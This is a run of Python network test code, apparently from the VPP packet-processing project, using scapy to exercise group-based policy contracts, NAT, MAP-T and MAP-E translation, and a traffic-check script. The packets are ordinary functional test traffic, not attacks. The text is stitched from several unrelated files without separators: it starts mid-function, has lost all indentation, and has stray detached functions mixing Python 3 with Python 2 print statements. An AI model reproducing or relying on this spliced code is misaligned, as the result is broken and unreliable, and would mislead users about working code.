# floating IPs route via EPG recirc
r = VppIpRoute(self,
ep.floating_ip,
ep.ip_len, [
VppRoutePath(ep.floating_ip,
ep.recirc.recirc.sw_if_index,
is_dvr=1,
proto=ep.proto)
],
table_id=20,
is_ip6=ep.is_ip6)
r.add_vpp_config()
ep_routes.append(r)
# L2 FIB entries in the NAT EPG BD to bridge the packets from
# the outside direct to the internal EPG
self.vapi.l2fib_add_del(ep.mac,
epg_nat.bd,
ep.recirc.recirc.sw_if_index,
is_add=1)
#
# ARP packets for unknown IP are flooded
#
pkt_arp = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
ARP(op="who-has",
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=self.pg0.remote_mac,
pdst=epgs[0].bvi_ip4,
psrc="10.0.0.88"))
self.send_and_expect(self.pg0, [pkt_arp], self.pg0)
#
# ARP/ND packets get a response
#
pkt_arp = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
ARP(op="who-has",
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=self.pg0.remote_mac,
pdst=epgs[0].bvi_ip4,
psrc=eps[0].ip))
self.send_and_expect(self.pg0, [pkt_arp], self.pg0)
nsma = in6_getnsma(inet_pton(AF_INET6, eps[4].ip))
d = inet_ntop(AF_INET6, nsma)
pkt_nd = (Ether(dst=in6_getnsmac(nsma)) / IPv6(dst=d, src=eps[4].ip) /
ICMPv6ND_NS(tgt=epgs[0].bvi_ip6) /
ICMPv6NDOptSrcLLAddr(lladdr=self.pg0.remote_mac))
self.send_and_expect(self.pg0, [pkt_nd], self.pg0)
#
# broadcast packets are flooded
#
pkt_bcast = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
IP(src=eps[0].ip, dst="232.1.1.1") /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
self.vapi.cli("clear trace")
self.pg0.add_stream(pkt_bcast)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rxd = eps[1].itf.get_capture(1)
self.assertEqual(rxd[0][Ether].dst, pkt_bcast[Ether].dst)
rxd = epgs[0].uplink.get_capture(1)
self.assertEqual(rxd[0][Ether].dst, pkt_bcast[Ether].dst)
#
# packets to non-local L3 destinations dropped
#
pkt_intra_epg_220_ip4 = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_inter_epg_222_ip4 = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IP(src=eps[0].ip, dst="10.0.1.99") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_assert_no_replies(self.pg0, pkt_intra_epg_220_ip4 * 65)
pkt_inter_epg_222_ip6 = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IPv6(src=eps[4].ip, dst="2001:10::99") /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
self.send_and_assert_no_replies(self.pg0, pkt_inter_epg_222_ip6 * 65)
#
# Add the subnet routes
#
s41 = VppGbpSubnet(self, 0, "10.0.0.0", 24)
s42 = VppGbpSubnet(self, 0, "10.0.1.0", 24)
s43 = VppGbpSubnet(self, 0, "10.0.2.0", 24)
s41.add_vpp_config()
s42.add_vpp_config()
s43.add_vpp_config()
s61 = VppGbpSubnet(self, 0, "2001:10::1", 64, is_ip6=True)
s62 = VppGbpSubnet(self, 0, "2001:10:1::1", 64, is_ip6=True)
s63 = VppGbpSubnet(self, 0, "2001:10:2::1", 64, is_ip6=True)
s61.add_vpp_config()
s62.add_vpp_config()
s63.add_vpp_config()
self.send_and_expect_bridged(self.pg0, pkt_intra_epg_220_ip4 * 65,
self.pg4)
self.send_and_expect_bridged(self.pg3, pkt_inter_epg_222_ip4 * 65,
self.pg6)
self.send_and_expect_bridged6(self.pg3, pkt_inter_epg_222_ip6 * 65,
self.pg6)
self.logger.info(self.vapi.cli("sh ip fib 11.0.0.2"))
self.logger.info(self.vapi.cli("sh gbp endpoint-group"))
self.logger.info(self.vapi.cli("sh gbp endpoint"))
self.logger.info(self.vapi.cli("sh gbp recirc"))
self.logger.info(self.vapi.cli("sh int"))
self.logger.info(self.vapi.cli("sh int addr"))
self.logger.info(self.vapi.cli("sh int feat loop6"))
self.logger.info(self.vapi.cli("sh vlib graph ip4-gbp-src-classify"))
self.logger.info(self.vapi.cli("sh int feat loop3"))
#
# Packet destined to unknown unicast is sent on the epg uplink ...
#
pkt_intra_epg_220_to_uplink = (
Ether(src=self.pg0.remote_mac, dst="00:00:00:33:44:55") /
IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_expect_bridged(self.pg0,
pkt_intra_epg_220_to_uplink * 65,
self.pg4)
# ... and nowhere else
self.pg1.get_capture(0, timeout=0.1)
self.pg1.assert_nothing_captured(remark="Flood onto other VMS")
pkt_intra_epg_221_to_uplink = (
Ether(src=self.pg2.remote_mac, dst="00:00:00:33:44:66") /
IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_expect_bridged(self.pg2,
pkt_intra_epg_221_to_uplink * 65,
self.pg5)
#
# Packets from the uplink are forwarded in the absence of a contract
#
pkt_intra_epg_220_from_uplink = (
Ether(src="00:00:00:33:44:55", dst=self.pg0.remote_mac) /
IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_expect_bridged(self.pg4,
pkt_intra_epg_220_from_uplink * 65,
self.pg0)
#
# in the absence of policy, endpoints in the same EPG
# can communicate
#
pkt_intra_epg = (
Ether(src=self.pg0.remote_mac, dst=self.pg1.remote_mac) /
IP(src=eps[0].ip, dst=eps[1].ip) / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_expect_bridged(self.pg0, pkt_intra_epg * 65, self.pg1)
#
# in the abscense of policy, endpoints in the different EPG
# cannot communicate
#
pkt_inter_epg_220_to_221 = (
Ether(src=self.pg0.remote_mac, dst=self.pg2.remote_mac) /
IP(src=eps[0].ip, dst=eps[2].ip) / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_inter_epg_221_to_220 = (
Ether(src=self.pg2.remote_mac, dst=self.pg0.remote_mac) /
IP(src=eps[2].ip, dst=eps[0].ip) / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_inter_epg_220_to_222 = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IP(src=eps[0].ip, dst=eps[3].ip) / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_assert_no_replies(self.pg0,
pkt_inter_epg_220_to_221 * 65)
self.send_and_assert_no_replies(self.pg0,
pkt_inter_epg_220_to_222 * 65)
#
# A uni-directional contract from EPG 220 -> 221
#
c1 = VppGbpContract(self, 220, 221, 0)
c1.add_vpp_config()
self.send_and_expect_bridged(self.pg0, pkt_inter_epg_220_to_221 * 65,
self.pg2)
self.send_and_assert_no_replies(self.pg0,
pkt_inter_epg_220_to_222 * 65)
#
# contract for the return direction
#
c2 = VppGbpContract(self, 221, 220, 0)
c2.add_vpp_config()
self.send_and_expect_bridged(self.pg0, pkt_inter_epg_220_to_221 * 65,
self.pg2)
self.send_and_expect_bridged(self.pg2, pkt_inter_epg_221_to_220 * 65,
self.pg0)
#
# check that inter group is still disabled for the groups
# not in the contract.
#
self.send_and_assert_no_replies(self.pg0,
pkt_inter_epg_220_to_222 * 65)
#
# A uni-directional contract from EPG 220 -> 222 'L3 routed'
#
c3 = VppGbpContract(self, 220, 222, 0)
c3.add_vpp_config()
self.logger.info(self.vapi.cli("sh gbp contract"))
self.send_and_expect_routed(self.pg0, pkt_inter_epg_220_to_222 * 65,
self.pg3, self.router_mac)
#
# remove both contracts, traffic stops in both directions
#
c2.remove_vpp_config()
c1.remove_vpp_config()
c3.remove_vpp_config()
self.send_and_assert_no_replies(self.pg2,
pkt_inter_epg_221_to_220 * 65)
self.send_and_assert_no_replies(self.pg0,
pkt_inter_epg_220_to_221 * 65)
self.send_and_expect_bridged(self.pg0, pkt_intra_epg * 65, self.pg1)
#
# EPs to the outside world
#
# in the EP's RD an external subnet via the NAT EPG's recirc
se1 = VppGbpSubnet(self,
0,
"0.0.0.0",
0,
is_internal=False,
sw_if_index=recirc_nat.recirc.sw_if_index,
epg=epg_nat.epg)
se1.add_vpp_config()
se2 = VppGbpSubnet(self,
0,
"11.0.0.0",
8,
is_internal=False,
sw_if_index=recirc_nat.recirc.sw_if_index,
epg=epg_nat.epg)
se2.add_vpp_config()
se16 = VppGbpSubnet(self,
0,
"::",
0,
is_internal=False,
sw_if_index=recirc_nat.recirc.sw_if_index,
epg=epg_nat.epg,
is_ip6=True)
se16.add_vpp_config()
# in the NAT RD an external subnet via the NAT EPG's uplink
se3 = VppGbpSubnet(self,
20,
"0.0.0.0",
0,
is_internal=False,
sw_if_index=epg_nat.uplink.sw_if_index,
epg=epg_nat.epg)
se36 = VppGbpSubnet(self,
20,
"::",
0,
is_internal=False,
sw_if_index=epg_nat.uplink.sw_if_index,
epg=epg_nat.epg,
is_ip6=True)
se4 = VppGbpSubnet(self,
20,
"11.0.0.0",
8,
is_internal=False,
sw_if_index=epg_nat.uplink.sw_if_index,
epg=epg_nat.epg)
se3.add_vpp_config()
se36.add_vpp_config()
se4.add_vpp_config()
self.logger.info(self.vapi.cli("sh ip fib 0.0.0.0/0"))
self.logger.info(self.vapi.cli("sh ip fib 11.0.0.1"))
self.logger.info(self.vapi.cli("sh ip6 fib ::/0"))
self.logger.info(self.vapi.cli("sh ip6 fib %s" % eps[4].floating_ip))
#
# From an EP to an outside addess: IN2OUT
#
pkt_inter_epg_220_to_global = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IP(src=eps[0].ip, dst="1.1.1.1") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
# no policy yet
self.send_and_assert_no_replies(self.pg0,
pkt_inter_epg_220_to_global * 65)
c4 = VppGbpContract(self, 220, 333, 0)
c4.add_vpp_config()
self.send_and_expect_natted(self.pg0, pkt_inter_epg_220_to_global * 65,
self.pg7, eps[0].floating_ip)
pkt_inter_epg_220_to_global = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IPv6(src=eps[4].ip, dst="6001::1") / UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
self.send_and_expect_natted6(self.pg0,
pkt_inter_epg_220_to_global * 65,
self.pg7, eps[4].floating_ip)
#
# From a global address to an EP: OUT2IN
#
pkt_inter_epg_220_from_global = (
Ether(src=self.router_mac, dst=self.pg0.remote_mac) /
IP(dst=eps[0].floating_ip, src="1.1.1.1") /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
self.send_and_assert_no_replies(self.pg7,
pkt_inter_epg_220_from_global * 65)
c5 = VppGbpContract(self, 333, 220, 0)
c5.add_vpp_config()
self.send_and_expect_unnatted(self.pg7,
pkt_inter_epg_220_from_global * 65,
eps[0].itf, eps[0].ip)
pkt_inter_epg_220_from_global = (
Ether(src=self.router_mac, dst=self.pg0.remote_mac) /
IPv6(dst=eps[4].floating_ip, src="6001::1") /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
self.send_and_expect_unnatted6(self.pg7,
pkt_inter_epg_220_from_global * 65,
eps[4].itf, eps[4].ip)
#
# From a local VM to another local VM using resp. public addresses:
# IN2OUT2IN
#
pkt_intra_epg_220_global = (
Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
IP(src=eps[0].ip, dst=eps[1].floating_ip) /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
self.send_and_expect_double_natted(eps[0].itf,
pkt_intra_epg_220_global * 65,
eps[1].itf, eps[0].floating_ip,
eps[1].ip)
pkt_intra_epg_220_global = (
Ether(src=self.pg4.remote_mac, dst=self.router_mac) /
IPv6(src=eps[4].ip, dst=eps[5].floating_ip) /
UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
self.send_and_expect_double_natted6(eps[4].itf,
pkt_intra_epg_220_global * 65,
eps[5].itf, eps[4].floating_ip,
eps[5].ip)
#
# cleanup
#
for ep in eps:
# del static mappings for each EP from the 10/8 to 11/8 network
if ep.af == AF_INET:
self.vapi.nat44_add_del_static_mapping(ep.ip_n,
ep.floating_ip_n,
vrf_id=0,
addr_only=1,
is_add=0)
else:
self.vapi.nat66_add_del_static_mapping(ep.ip_n,
ep.floating_ip_n,
vrf_id=0,
is_add=0)
for epg in epgs:
# IP config on the BVI interfaces
self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
epg.bvi_ip4_n,
32,
is_add=0)
self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
epg.bvi_ip6_n,
128,
is_add=0,
is_ipv6=True)
self.logger.info(self.vapi.cli("sh int addr"))
epg.uplink.set_table_ip4(0)
epg.uplink.set_table_ip6(0)
if epg != epgs[0] and epg != epgs[3]:
epg.bvi.set_table_ip4(0)
epg.bvi.set_table_ip6(0)
self.vapi.nat44_interface_add_del_feature(epg.bvi.sw_if_index,
is_inside=1,
is_add=0)
self.vapi.nat66_add_del_interface(epg.bvi.sw_if_index,
is_inside=1,
is_add=0)
for recirc in recircs:
recirc.recirc.set_table_ip4(0)
recirc.recirc.set_table_ip6(0)
self.vapi.nat44_interface_add_del_feature(
recirc.recirc.sw_if_index, is_inside=0, is_add=0)
self.vapi.nat66_add_del_interface(recirc.recirc.sw_if_index,
is_inside=0,
is_add=0)
def test_map_t(self):
""" MAP-T """
#
# Add a domain that maps from pg0 to pg1
#
map_dst = '2001:db8::/32'
map_src = '1234:5678:90ab:cdef::/64'
ip4_pfx = '192.168.0.0/24'
tag = 'MAP-T Tag.'
self.vapi.map_add_domain(ip6_prefix=map_dst,
ip4_prefix=ip4_pfx,
ip6_src=map_src,
ea_bits_len=16,
psid_offset=6,
psid_length=4,
mtu=1500,
tag=tag)
# Enable MAP-T on interfaces.
self.vapi.map_if_enable_disable(is_enable=1,
sw_if_index=self.pg0.sw_if_index,
is_translation=1)
self.vapi.map_if_enable_disable(is_enable=1,
sw_if_index=self.pg1.sw_if_index,
is_translation=1)
# Ensure MAP doesn't steal all packets!
v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg0.remote_ip4) /
UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
rx = self.send_and_expect(self.pg0, v4 * 1, self.pg0)
v4_reply = v4[1]
v4_reply.ttl -= 1
for p in rx:
self.validate(p[1], v4_reply)
# Ensure MAP doesn't steal all packets
v6 = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IPv6(src=self.pg1.remote_ip6, dst=self.pg1.remote_ip6) /
UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
rx = self.send_and_expect(self.pg1, v6 * 1, self.pg1)
v6_reply = v6[1]
v6_reply.hlim -= 1
for p in rx:
self.validate(p[1], v6_reply)
map_route = VppIpRoute(self, "2001:db8::", 32, [
VppRoutePath(self.pg1.remote_ip6,
self.pg1.sw_if_index,
proto=DpoProto.DPO_PROTO_IP6)
])
map_route.add_vpp_config()
#
# Send a v4 packet that will be translated
#
p_ether = Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac)
p_ip4 = IP(src=self.pg0.remote_ip4, dst='192.168.0.1')
payload = TCP(sport=0xabcd, dport=0xabcd)
p4 = (p_ether / p_ip4 / payload)
p6_translated = (IPv6(src="1234:5678:90ab:cdef:ac:1001:200:0",
dst="2001:db8:1f0::c0a8:1:f") / payload)
p6_translated.hlim -= 1
rx = self.send_and_expect(self.pg0, p4 * 1, self.pg1)
for p in rx:
self.validate(p[1], p6_translated)
# Send back an IPv6 packet that will be "untranslated"
p_ether6 = Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac)
p_ip6 = IPv6(src='2001:db8:1f0::c0a8:1:f',
dst='1234:5678:90ab:cdef:ac:1001:200:0')
p6 = (p_ether6 / p_ip6 / payload)
p4_translated = (IP(src='192.168.0.1', dst=self.pg0.remote_ip4) /
payload)
p4_translated.id = 0
p4_translated.ttl -= 1
rx = self.send_and_expect(self.pg1, p6 * 1, self.pg0)
for p in rx:
self.validate(p[1], p4_translated)
# IPv4 TTL
ip4_ttl_expired = IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=0)
p4 = (p_ether / ip4_ttl_expired / payload)
icmp4_reply = (
IP(id=0, ttl=254, src=self.pg0.local_ip4, dst=self.pg0.remote_ip4)
/ ICMP(type='time-exceeded', code='ttl-zero-during-transit') /
IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=0) / payload)
rx = self.send_and_expect(self.pg0, p4 * 1, self.pg0)
for p in rx:
self.validate(p[1], icmp4_reply)
'''
This one is broken, cause it would require hairpinning...
# IPv4 TTL TTL1
ip4_ttl_expired = IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=1)
p4 = (p_ether / ip4_ttl_expired / payload)
icmp4_reply = IP(id=0, ttl=254, src=self.pg0.local_ip4,
dst=self.pg0.remote_ip4) / \
ICMP(type='time-exceeded', code='ttl-zero-during-transit' ) / \
IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=0) / payload
rx = self.send_and_expect(self.pg0, p4*1, self.pg0)
for p in rx:
self.validate(p[1], icmp4_reply)
'''
# IPv6 Hop limit
ip6_hlim_expired = IPv6(hlim=0,
src='2001:db8:1ab::c0a8:1:ab',
dst='1234:5678:90ab:cdef:ac:1001:200:0')
p6 = (p_ether6 / ip6_hlim_expired / payload)
icmp6_reply = (IPv6(
hlim=255, src=self.pg1.local_ip6, dst="2001:db8:1ab::c0a8:1:ab") /
ICMPv6TimeExceeded(code=0) /
IPv6(src="2001:db8:1ab::c0a8:1:ab",
dst='1234:5678:90ab:cdef:ac:1001:200:0',
hlim=0) / payload)
rx = self.send_and_expect(self.pg1, p6 * 1, self.pg1)
for p in rx:
self.validate(p[1], icmp6_reply)
# IPv4 Well-known port
p_ip4 = IP(src=self.pg0.remote_ip4, dst='192.168.0.1')
payload = UDP(sport=200, dport=200)
p4 = (p_ether / p_ip4 / payload)
self.send_and_assert_no_replies(self.pg0, p4 * 1)
# IPv6 Well-known port
payload = UDP(sport=200, dport=200)
p6 = (p_ether6 / p_ip6 / payload)
self.send_and_assert_no_replies(self.pg1, p6 * 1)
# Packet fragmentation
payload = UDP(sport=40000, dport=4000) / self.payload(1453)
p4 = (p_ether / p_ip4 / payload)
self.pg_enable_capture()
self.pg0.add_stream(p4)
self.pg_start()
rx = self.pg1.get_capture(2)
for p in rx:
pass
# TODO: Manual validation
# self.validate(p[1], icmp4_reply)
# Packet fragmentation send fragments
payload = UDP(sport=40000, dport=4000) / self.payload(1453)
p4 = (p_ether / p_ip4 / payload)
frags = fragment(p4, fragsize=1000)
self.pg_enable_capture()
self.pg0.add_stream(frags)
self.pg_start()
rx = self.pg1.get_capture(2)
for p in rx:
pass
# p.show2()
# reass_pkt = reassemble(rx)
# p4_reply.ttl -= 1
# p4_reply.id = 256
# self.validate(reass_pkt, p4_reply)
# TCP MSS clamping
self.vapi.map_param_set_tcp(1300)
#
# Send a v4 TCP SYN packet that will be translated and MSS clamped
#
p_ether = Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac)
p_ip4 = IP(src=self.pg0.remote_ip4, dst='192.168.0.1')
payload = TCP(sport=0xabcd,
dport=0xabcd,
flags="S",
options=[('MSS', 1460)])
p4 = (p_ether / p_ip4 / payload)
p6_translated = (IPv6(src="1234:5678:90ab:cdef:ac:1001:200:0",
dst="2001:db8:1f0::c0a8:1:f") / payload)
p6_translated.hlim -= 1
p6_translated[TCP].options = [('MSS', 1300)]
rx = self.send_and_expect(self.pg0, p4 * 1, self.pg1)
for p in rx:
self.validate(p[1], p6_translated)
# Send back an IPv6 packet that will be "untranslated"
p_ether6 = Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac)
p_ip6 = IPv6(src='2001:db8:1f0::c0a8:1:f',
dst='1234:5678:90ab:cdef:ac:1001:200:0')
p6 = (p_ether6 / p_ip6 / payload)
p4_translated = (IP(src='192.168.0.1', dst=self.pg0.remote_ip4) /
payload)
p4_translated.id = 0
p4_translated.ttl -= 1
p4_translated[TCP].options = [('MSS', 1300)]
rx = self.send_and_expect(self.pg1, p6 * 1, self.pg0)
for p in rx:
self.validate(p[1], p4_translated)
def test_map_e(self):
""" MAP-E """
#
# Add a route to the MAP-BR
#
map_br_pfx = "2001::"
map_br_pfx_len = 32
map_route = VppIpRoute(
self, map_br_pfx, map_br_pfx_len,
[VppRoutePath(self.pg1.remote_ip6, self.pg1.sw_if_index)])
map_route.add_vpp_config()
#
# Add a domain that maps from pg0 to pg1
#
map_dst = '2001::/32'
map_src = '3000::1/128'
client_pfx = '192.168.0.0/16'
map_translated_addr = '2001:0:101:7000:0:c0a8:101:7'
tag = 'MAP-E tag.'
self.vapi.map_add_domain(ip4_prefix=client_pfx,
ip6_prefix=map_dst,
ip6_src=map_src,
ea_bits_len=20,
psid_offset=4,
psid_length=4,
tag=tag)
self.vapi.map_param_set_security_check(enable=1, fragments=1)
# Enable MAP on interface.
self.vapi.map_if_enable_disable(is_enable=1,
sw_if_index=self.pg0.sw_if_index,
is_translation=0)
# Ensure MAP doesn't steal all packets!
v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg0.remote_ip4) /
UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
rx = self.send_and_expect(self.pg0, v4 * 1, self.pg0)
v4_reply = v4[1]
v4_reply.ttl -= 1
for p in rx:
self.validate(p[1], v4_reply)
#
# Fire in a v4 packet that will be encapped to the BR
#
v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='192.168.1.1') /
UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
self.send_and_assert_encapped_one(v4, "3000::1", map_translated_addr)
#
# Verify reordered fragments are able to pass as well
#
v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(id=1, src=self.pg0.remote_ip4, dst='192.168.1.1') /
UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 1000))
frags = fragment_rfc791(v4, 400)
frags.reverse()
self.send_and_assert_encapped(frags, "3000::1", map_translated_addr)
# Enable MAP on interface.
self.vapi.map_if_enable_disable(is_enable=1,
sw_if_index=self.pg1.sw_if_index,
is_translation=0)
# Ensure MAP doesn't steal all packets
v6 = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IPv6(src=self.pg1.remote_ip6, dst=self.pg1.remote_ip6) /
UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
rx = self.send_and_expect(self.pg1, v6 * 1, self.pg1)
v6_reply = v6[1]
v6_reply.hlim -= 1
for p in rx:
self.validate(p[1], v6_reply)
#
# Fire in a V6 encapped packet.
# expect a decapped packet on the inside ip4 link
#
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IPv6(dst='3000::1', src=map_translated_addr) /
IP(dst=self.pg0.remote_ip4, src='192.168.1.1') /
UDP(sport=10000, dport=20000) / Raw(b'\xa5' * 100))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture(1)
rx = rx[0]
self.assertFalse(rx.haslayer(IPv6))
self.assertEqual(rx[IP].src, p[IP].src)
self.assertEqual(rx[IP].dst, p[IP].dst)
#
# Verify encapped reordered fragments pass as well
#
p = (IP(id=1, dst=self.pg0.remote_ip4, src='192.168.1.1') /
UDP(sport=10000, dport=20000) / Raw(b'\xa5' * 1500))
frags = fragment_rfc791(p, 400)
frags.reverse()
stream = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IPv6(dst='3000::1', src=map_translated_addr) / x
for x in frags)
self.pg1.add_stream(stream)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture(len(frags))
for r in rx:
self.assertFalse(r.haslayer(IPv6))
self.assertEqual(r[IP].src, p[IP].src)
self.assertEqual(r[IP].dst, p[IP].dst)
# Verify that fragments pass even if ipv6 layer is fragmented
stream = (IPv6(dst='3000::1', src=map_translated_addr) / x
for x in frags)
v6_stream = [
Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) / x
for i in range(len(frags)) for x in fragment_rfc8200(
IPv6(dst='3000::1', src=map_translated_addr) /
frags[i], i, 200)
]
self.pg1.add_stream(v6_stream)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture(len(frags))
for r in rx:
self.assertFalse(r.haslayer(IPv6))
self.assertEqual(r[IP].src, p[IP].src)
self.assertEqual(r[IP].dst, p[IP].dst)
#
# Pre-resolve. No API for this!!
#
self.vapi.ppcli("map params pre-resolve ip6-nh 4001::1")
self.send_and_assert_no_replies(self.pg0, v4,
"resolved via default route")
#
# Add a route to 4001::1. Expect the encapped traffic to be
# sent via that routes next-hop
#
pre_res_route = VppIpRoute(
self, "4001::1", 128,
[VppRoutePath(self.pg1.remote_hosts[2].ip6, self.pg1.sw_if_index)])
pre_res_route.add_vpp_config()
self.send_and_assert_encapped_one(v4,
"3000::1",
map_translated_addr,
dmac=self.pg1.remote_hosts[2].mac)
#
# change the route to the pre-solved next-hop
#
pre_res_route.modify(
[VppRoutePath(self.pg1.remote_hosts[3].ip6, self.pg1.sw_if_index)])
pre_res_route.add_vpp_config()
self.send_and_assert_encapped_one(v4,
"3000::1",
map_translated_addr,
dmac=self.pg1.remote_hosts[3].mac)
#
# cleanup. The test infra's object registry will ensure
# the route is really gone and thus that the unresolve worked.
#
pre_res_route.remove_vpp_config()
self.vapi.ppcli("map params pre-resolve del ip6-nh 4001::1")
def ns_req(cls, src_host, host):
nsma = in6_getnsma(inet_pton(AF_INET6, "fd10::ffff"))
d = inet_ntop(AF_INET6, nsma)
return (Ether(dst="ff:ff:ff:ff:ff:ff", src=src_host.mac) /
IPv6(dst=d, src=src_host.ip6) / ICMPv6ND_NS(tgt=host.ip6) /
ICMPv6NDOptSrcLLAddr(lladdr=src_host.mac))
def main(): # pylint: disable=too-many-statements, too-many-locals
"""Main function of the script file."""
args = TrafficScriptArg([
'tx_dst_mac', 'tx_src_mac', 'tx_dst_ipv6', 'tx_src_ipv6',
'tx_dst_ipv4', 'tx_src_ipv4', 'tx_src_udp_port', 'rx_dst_mac',
'rx_src_mac'
])
rx_if = args.get_arg('rx_if')
tx_if = args.get_arg('tx_if')
tx_src_mac = args.get_arg('tx_src_mac')
tx_dst_mac = args.get_arg('tx_dst_mac')
tx_dst_ipv6 = args.get_arg('tx_dst_ipv6')
tx_src_ipv6 = args.get_arg('tx_src_ipv6')
tx_dst_ipv4 = args.get_arg('tx_dst_ipv4')
tx_src_ipv4 = args.get_arg('tx_src_ipv4')
tx_src_udp_port = int(args.get_arg('tx_src_udp_port'))
tx_dst_udp_port = 20000
rx_dst_mac = args.get_arg('rx_dst_mac')
rx_src_mac = args.get_arg('rx_src_mac')
rxq = RxQueue(rx_if)
txq = TxQueue(tx_if)
sent_packets = []
# Create empty UDP datagram in IPv4 and IPv6
tx_pkt = (Ether(dst=tx_dst_mac, src=tx_src_mac) /
IPv6(src=tx_src_ipv6, dst=tx_dst_ipv6) /
IP(src=tx_src_ipv4, dst=tx_dst_ipv4) /
UDP(sport=tx_src_udp_port, dport=tx_dst_udp_port))
txq.send(tx_pkt)
sent_packets.append(tx_pkt)
for _ in range(5):
pkt = rxq.recv(2)
if _is_udp_in_ipv4(pkt):
ether = pkt
break
else:
raise RuntimeError("UDP in IPv4 Rx error.")
# check ethernet
if ether.dst != rx_dst_mac:
raise RuntimeError("Destination MAC error {} != {}.".format(
ether.dst, rx_dst_mac))
print "Destination MAC: OK."
if ether.src != rx_src_mac:
raise RuntimeError("Source MAC error {} != {}.".format(
ether.src, rx_src_mac))
print "Source MAC: OK."
ipv4 = ether.payload
# check ipv4
if ipv4.dst != tx_dst_ipv4:
raise RuntimeError("Destination IPv4 error {} != {}.".format(
ipv4.dst, tx_dst_ipv4))
print "Destination IPv4: OK."
if ipv4.src != tx_src_ipv4:
raise RuntimeError("Source IPv4 error {} != {}.".format(
ipv4.src, tx_src_ipv4))
print "Source IPv4: OK."
if ipv4.proto != 17: # UDP
raise RuntimeError("IPv4 protocol error {} != UDP.".format(ipv4.proto))
print "IPv4 protocol: OK."
udp = ipv4.payload
# check udp
if udp.dport != tx_dst_udp_port:
raise RuntimeError("UDP dport error {} != {}.".format(
udp.dport, tx_dst_udp_port))
print "UDP dport: OK."
if udp.sport != tx_src_udp_port:
raise RuntimeError("UDP sport error {} != {}.".format(
udp.sport, tx_src_udp_port))
print "UDP sport: OK."
sys.exit(0)